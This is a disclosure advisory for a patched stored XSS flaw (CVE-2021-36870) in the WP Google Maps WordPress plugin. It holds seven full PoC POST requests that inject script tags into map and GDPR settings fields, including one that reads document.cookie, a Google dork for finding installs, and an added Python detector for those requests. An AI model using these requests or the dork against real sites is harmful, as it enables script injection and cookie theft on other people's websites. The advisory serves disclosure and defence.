[+] :: VULNERABILITY: WP Google Maps Plugin < 8.1.13 - Authenticated Persistent XSS
[+] :: GOOGLE DORK: inurl:/wp-content/plugins/wp-google-maps/
[+] :: DATE: 2021-06-04
[+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ]
[+] :: VENDOR: WP Google Maps [ https://www.wpgmaps.com ]
[+] :: SOFTWARE VERSION: < 8.1.13
[+] :: SOFTWARE LINK: https://wordpress.org/plugins/wp-google-maps/
[+] :: CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
[+] :: CWE: CWE-79
[+] :: CVE: CVE-2021-36870
[i] == [ Info: ]
An Authenticated Persistent XSS vulnerability was discovered in the WP Google Maps plugin for WordPress in versions prior to v8.1.13.
Vulnerable parameter(s): &address (markers), &polyname (polygons, polylines), &name (circles, rectangles), &wpgmza_gdpr_company_name and &wpgmza_gdpr_retention_purpose (GDPR Compliance settings).
[?] == [ Code: ]
-
[$] == [ Impact: ]
Injected JavaScript is stored by the plugin and executed in the browsers of users who view the affected map or settings content. The injection can be combined with other attack vectors against the targeted system, which can lead to a complete compromise of the resource.
[%] == [ Payloads: ]
<script>alert(origin)</script>
<script>alert(document.domain)</script>
[!] == [ PoC #1 | Authenticated Persistent XSS | Maps > Markers > &address: ]
POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 125
id=-1&map_id=1&address=%3Cscript%3Ealert(origin)%3C%2Fscript%3E&lat=39.953798&lng=-75.17193&anim=0&infoopen=0&approved=1
[!] == [ PoC #2 | Authenticated Persistent XSS | Maps > Polygons > &polyname: ]
POST /wp-json/wpgmza/v1/polygons/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e722c293b0
X-Requested-With: XMLHttpRequest
Content-Length: 378
id=-1&map_id=1&polyname=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&title=&description=&link=&linecolor=%23666666&lineopacity=0.5&fillcolor=%23cc0000&opacity=0.5&ohlinecolor=%23333333&ohfillcolor=%23ff0000&ohopacity=0.7&polydata=%5B%7B%22lat%22%3A36.77828315944244%2C%22lng%22%3A-119.41792718131755%7D%2C%7B%22lat%22%3A36.77826892670358%2C%22lng%22%3A-119.41787688989852%7D%5D
[!] == [ PoC #3 | Authenticated Persistent XSS | Maps > Polylines > &polyname: ]
POST /wp-json/wpgmza/v1/polylines/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e722c293b0
X-Requested-With: XMLHttpRequest
Content-Length: 274
id=-1&map_id=1&polyname=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&linecolor=%23000000&opacity=0.5&linethickness=4&polydata=%5B%7B%22lat%22%3A36.778279399851286%2C%22lng%22%3A-119.4179590325496%7D%2C%7B%22lat%22%3A36.77827134358396%2C%22lng%22%3A-119.41787018437599%7D%5D
[!] == [ PoC #4 | Authenticated Persistent XSS | Maps > Circles > &name: ]
POST /wp-json/wpgmza/v1/circles/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e722c293b0
X-Requested-With: XMLHttpRequest
Content-Length: 171
id=-1&map_id=1&center=36.778281548189106%2C+-119.41786884327148&name=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&radius=0.0027967709419604793&color=%23000000&opacity=0.5
[!] == [ PoC #5 | Authenticated Persistent XSS | Maps > Rectangles > &name: ]
POST /wp-json/wpgmza/v1/rectangles/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e722c293b0
X-Requested-With: XMLHttpRequest
Content-Length: 191
id=-1&map_id=1&cornerA=36.7782930621891%2C+-119.41787860787272&cornerB=36.778272115895994%2C+-119.41782898700595&name=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&color=%23000000&opacity=0.5
[!] == [ PoC #6 | Authenticated Persistent XSS | Settings > GDPR Compliance > Company Name > &wpgmza_gdpr_company_name: ]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1989
nonce=f3223b635d&action=wpgmza_save_settings&wpgmza_maps_engine=google-maps&user_interface_style=minimal&wpgmza_settings_cat_logic=0&wpgmza_settings_filterbycat_type=1&use_fontawesome=4.*&tile_server_url=&tile_server_url_override=&wpgmza_load_engine_api_condition=where-required&wpgmza_always_include_engine_api_on_pages=&wpgmza_always_exclude_engine_api_on_pages=&wpgmza_settings_access_level=manage_options&wpgmza_settings_retina_width=13&wpgmza_settings_retina_height=13&wpgmza_settings_image_width=&wpgmza_settings_image_height=&wpgmza_settings_infowindow_width=&wpgmza_settings_infowindow_link_text=&wpgmza_settings_map_open_marker_by=1&wpgmza_store_locator_radii=&wpgmza_google_maps_api_key=&open_layers_api_key=&wpgmza_settings_marker_pull=0&wpgmza_marker_xml_location=&wpgmza_marker_xml_url=&wpgmza_custom_css=&wpgmza_custom_js=&wpgmza_gdpr_require_consent_before_load=on&wpgmza_gdpr_company_name=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&wpgmza_gdpr_retention_purpose=displaying+map+tiles%2C+geocoding+addresses+and+calculating+and+display+directions.&wpgmza_gdpr_override_notice=on&wpgmza_gdpr_notice_override_text=
[!] == [ PoC #7 | Authenticated Persistent XSS | Settings > GDPR Compliance > Retention Purpose(s) > &wpgmza_gdpr_retention_purpose: ]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1989
nonce=f3223b635d&action=wpgmza_save_settings&wpgmza_maps_engine=google-maps&user_interface_style=minimal&wpgmza_settings_cat_logic=0&wpgmza_settings_filterbycat_type=1&use_fontawesome=4.*&tile_server_url=&tile_server_url_override=&wpgmza_load_engine_api_condition=where-required&wpgmza_always_include_engine_api_on_pages=&wpgmza_always_exclude_engine_api_on_pages=&wpgmza_settings_access_level=manage_options&wpgmza_settings_retina_width=13&wpgmza_settings_retina_height=13&wpgmza_settings_image_width=&wpgmza_settings_image_height=&wpgmza_settings_infowindow_width=&wpgmza_settings_infowindow_link_text=&wpgmza_settings_map_open_marker_by=1&wpgmza_store_locator_radii=&wpgmza_google_maps_api_key=&open_layers_api_key=&wpgmza_settings_marker_pull=0&wpgmza_marker_xml_location=&wpgmza_marker_xml_url=&wpgmza_custom_css=&wpgmza_custom_js=&wpgmza_gdpr_require_consent_before_load=on&wpgmza_gdpr_company_name=PoC&wpgmza_gdpr_retention_purpose=displaying+map+tiles%2C+geocoding+addresses+and+calculating+and+display+directions.%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&wpgmza_gdpr_override_notice=on&wpgmza_gdpr_notice_override_text=
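Detection logic for the seven PoCs above, as an added example that is not part of the advisory: it takes request records (method, path, body) such as a WAF or reverse proxy that logs POST bodies would produce, decodes the form fields, and flags the exact endpoint/parameter pairs named in this advisory when they carry HTML markup or inline-handler syntax. The request records are constructed for the example; the endpoint paths, parameter names and the wpgmza_save_settings action come from the PoCs.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoint -> body parameters this advisory reports as unsanitized.
WATCHED = {
    r"^/wp-json/wpgmza/v1/markers/?$": {"address"},
    r"^/wp-json/wpgmza/v1/polygons/?$": {"polyname"},
    r"^/wp-json/wpgmza/v1/polylines/?$": {"polyname"},
    r"^/wp-json/wpgmza/v1/circles/?$": {"name"},
    r"^/wp-json/wpgmza/v1/rectangles/?$": {"name"},
    r"^/wp-admin/admin-post\.php$": {"wpgmza_gdpr_company_name",
                                    "wpgmza_gdpr_retention_purpose"},
}
# Any HTML tag, an on*= inline handler, or a javascript: URL.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z][^>]*>|\bon\w+\s*=|javascript:", re.I)


def find_injections(method, path, body):
    """Return [(param, decoded_value)] for watched params that contain markup."""
    if method.upper() != "POST":
        return []
    for pattern, params in WATCHED.items():
        if re.match(pattern, path):
            break
    else:
        return []  # not a WP Google Maps write endpoint
    fields = parse_qs(body, keep_blank_values=True)  # decodes %XX and '+' once
    # admin-post.php is shared by many handlers; only the plugin's settings save matters.
    if path.startswith("/wp-admin/admin-post.php") and fields.get("action") != ["wpgmza_save_settings"]:
        return []
    hits = []
    for name in params:
        for value in fields.get(name, []):
            decoded = unquote(value)  # second pass catches double-encoded payloads
            if MARKUP_RE.search(decoded):
                hits.append((name, decoded))
    return hits


# Constructed sample records modelled on the PoC request shapes (not real traffic).
SAMPLE_REQUESTS = [
    ("POST", "/wp-json/wpgmza/v1/markers/", "id=-1&map_id=1&address=%3Cscript%3Ealert(origin)%3C%2Fscript%3E&lat=1&lng=2"),
    ("POST", "/wp-json/wpgmza/v1/markers/", "id=-1&map_id=1&address=1600+Amphitheatre+Pkwy&lat=1&lng=2"),
    ("POST", "/wp-json/wpgmza/v1/circles/", "id=-1&map_id=1&center=1%2C2&name=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&radius=1"),
    ("POST", "/wp-admin/admin-post.php", "nonce=x&action=wpgmza_save_settings&wpgmza_gdpr_company_name=%3Cscript%3Ealert(1)%3C%2Fscript%3E"),
    ("POST", "/wp-admin/admin-post.php", "action=other_plugin&wpgmza_gdpr_company_name=%3Cb%3Ehi%3C%2Fb%3E"),
    ("GET", "/wp-json/wpgmza/v1/markers/", ""),
]


def scan(records):
    """Return [(path, hits)] for every record that carries a flagged parameter."""
    return [(path, hits) for method, path, body in records if (hits := find_injections(method, path, body))]


if __name__ == "__main__":
    for path, hits in scan(SAMPLE_REQUESTS):
        print(path, hits)
```

Only the first, third and fourth sample records are reported; the benign address, the unrelated admin-post action and the GET request are ignored.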
[*] == [ Timeline: ]
2021.06.03 - WP Google Maps Plugin v8.1.12 released
2021.06.04 - Multiple XSS issues discovered
2021.06.09 - Vendor contacted
2021.06.15 - WP Google Maps Plugin v8.1.13 released
[@] == [ Contacts: ]
Website: visse.ru
LinkedIn: @visse
Medium: @visse
HackerOne: @visse
====================================================================
= Want money for vulnerabilities in the WordPress ecosystem? [Y/n] =
= ---------------------------------------------------------------- =
= [ Yes: ] Join the $ hunt here - https://patchstack.com/red-team/ =
= [ No: ] Hunter, think twice and don't miss the chance to gain $ =
====================================================================